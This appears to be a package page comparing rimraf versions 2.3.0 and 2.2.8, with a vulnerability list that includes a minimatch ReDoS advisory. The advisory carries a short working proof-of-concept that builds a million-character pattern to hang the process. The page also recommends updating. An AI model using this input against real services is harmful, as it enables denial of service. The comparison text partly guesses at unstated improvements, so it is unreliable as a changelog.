Rimraf is a popular Node.js package providing a robust and cross-platform solution for recursively deleting files and directories, akin to the rm -rf command in Unix-like systems. Comparing versions 2.3.0 and 2.2.8 reveals key updates for developers to consider. Version 2.3.0, released in March 2015, introduces a crucial dependency update, relying on glob version ^4.4.1 for file path matching. This likely incorporates performance enhancements and bug fixes related to file system traversal and wildcard expansion that glob provides. Developers should be aware of this updated dependency, ensuring compatibility within their existing project's dependency tree.
While both versions share the same fundamental functionality, MIT license, repository information, and author details, the significant gap in release dates—nearly a year between the two—suggests that 2.3.0 may contain important stability improvements, performance optimizations, or bug fixes accumulated over that period. Although specific changes aren't explicitly outlined in the provided data, the updated dependency on glob points to a focus on improving the robustness and efficiency of file deletion operations. Developers seeking the most stable and up-to-date version of Rimraf should prioritize version 2.3.0 for its enhanced handling of file paths using glob, alongside any possible under-the-hood improvements made during the year between releases, offering a more reliable file deletion utility for their projects.
All the vulnerabilities related to the version 2.3.0 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.